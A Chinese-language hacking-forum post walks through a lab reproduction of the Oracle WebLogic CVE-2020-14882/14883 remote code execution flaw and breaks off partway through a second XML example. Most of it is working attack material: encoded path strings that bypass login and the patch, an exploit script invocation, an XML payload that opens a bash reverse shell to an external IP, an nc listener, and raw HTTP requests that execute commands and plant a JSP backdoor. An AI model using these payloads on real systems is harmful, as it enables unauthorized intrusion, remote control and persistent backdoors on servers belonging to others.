taibeihacker
Moderator
0x01 漏洞描述
近日,Oracle WebLogic Server 遠程代碼執行漏洞(CVE-2020-14882)POC 被公開,未經身份驗證的遠程攻擊者可能通過構造特殊的HTTP GET請求,利用該漏洞在受影響的WebLogic Server 上執行任意代碼。它們均存在於WebLogic的Console控制台組件中。此組件為WebLogic全版本默認自帶組件,且該漏洞通過HTTP協議進行利用。將CVE-2020-14882和CVE-2020-14883進行組合利用後,遠程且未經授權的攻擊者可以直接在服務端執行任意代碼,獲取系統權限0x02 漏洞影响
Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.00x03 漏洞复现:
一、环境配置1.本次漏洞復現採用vulhub的環境,weblocig的版本為12.2.1.3.0,該版本存在漏洞vulhub/weblogic/CVE-2020-14882 at 173136b310693d50cac183c6218e64c861e2aaf5 · vulhub/vulhub
Pre-Built Vulnerable Environments Based on Docker-Compose - vulhub/vulhub
github.com
git clone https://github.com/vulhub/vulhub.git
cd vulhub/
cd weblogic/
pip install docker-compose
docker-compose up -d
訪問http://45.77.248.227:7001/console,即可部署weblogic環境
/console/images/%252E%252E%252Fconsole.portal
/console/css/%25%32%65%25%32%65%25%32%66console.portal
大寫換成小寫可繞過補丁:
/console/css/%252e%252e%252fconsole.portal
2.weblocig12繞過後台登錄
http://45.77.248.227:7001/console/css/%2e%2e%2fconsole.portal (小寫繞過)
三、脚本化利用腳本地址:https://github.com/backlion/CVE-2020-14882_ALL
1.命令回顯
python3 CVE-2020-14882_ALL.py -uhttp://45.77.248.227:7001/-c 'whomai'
2.外置xml文件無回顯命令執行
Linux反彈shell為例,編輯好poc.xml文件
beans xmlns='http://www.springframework.org/schema/beans' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd'
bean id='pb' class='java.lang.ProcessBuilder' init-method='start'
constructor-arg
list
value/bin/bash/value
value-c/value
value![CDATA[bash -i /dev/tcp/45.77.248.227/2233 01]]/value
/list
/constructor-arg
/bean
/beans
注意:上面反彈的地址是服務器IP地址
將poc.xml上傳到服務器上,然後python3開啟http server web
通過腳本執行命令
python3 CVE-2020-14882_ALL.py -u http://45.77.248.227:7001/-x http://45.77.248.227:8000/poc.xml
服務器上用nc監聽端口
nc -llvp 2233
四、手工提交利用方式一1.通過提交如下poc,可遠程執行命令,這裡最好是通過上面的繞過後台,然後通過burpsuit抓包,修改為如下的POC即可。
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter=currentThread.getCurrentWork(); java.lang.reflect.Field field=adapter.getClass().getDeclaredField('connectionHandler');field.setAccessible(true);Object obj=field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req=(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod('getServletRequest').invoke(obj); String cmd=req.getHeader('cmd');String[] cmds=System.getProperty('os.name').toLowerCase().contains('window') ? new String[]{'cmd.exe', '/c', cmd} : new String[]{'/bin/sh', '-c', cmd};if(cmd !=null ){ String result=new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter('\\A').next(); weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod('getResponse').invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: 45.77.248.227:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: */*
Referer: http://45.77.248.227:7001//console/...ang.Runtime.getRuntime().exec('calc.exe');");
Accept-Encoding: gzip, deflate
cmd:whoami pwd
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=8guoLM33tVnPrUomY4v8yi8C9bd-Glfq8JOrW2ntH-gJYHZ-oGgQ!1524101341
Connection: close
2.當前頁面的路徑為:
/u01/oracle/user_projects/domains/base_domain
3.那麼可以在該目錄下寫入後門文件:
/u01/oracle/wlserver/server/lib/consoleapp/webapp/images
4.通過提交如下poc即可寫入後門
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter=currentThread.getCurrentWork(); java.lang.reflect.Field field=adapter.getClass().getDeclaredField('connectionHandler');field.setAccessible(true);Object obj=field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req=(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod('getServletRequest').invoke(obj); String cmd=req.getHeader('cmd');String[] cmds=System.getProperty('os.name').toLowerCase().contains('window') ? new String[]{'cmd.exe', '/c', cmd} : new String[]{'/bin/sh', '-c', cmd};if(cmd !=null ){ String result=new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter('\\A').next(); weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod('getResponse').invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: 45.77.248.227:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: */*
Referer: http://45.77.248.227:7001//console/...ang.Runtime.getRuntime().exec('calc.exe');");
Accept-Encoding: gzip, deflate
cmd:whoami pwd echo 'this is a test!' /u01/oracle/wlserver/server/lib/consoleapp/webapp/images/test.jsp
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=8guoLM33tVnPrUomY4v8yi8C9bd-Glfq8JOrW2ntH-gJYHZ-oGgQ!1524101341
Connection: close
5.可以看到weblogic虛擬目錄下寫入了後門文件
6.訪問如下地址,即可獲取後門
五、手工利用方式二1、linux下通過遠程訪問xml文件執行反彈shell
首先,我們需要構造一個XML文件,並將其保存在Weblogic可以訪問到的服務器上,如http://45.77.248.227:8000/poc.xml:
?xml version='1.0'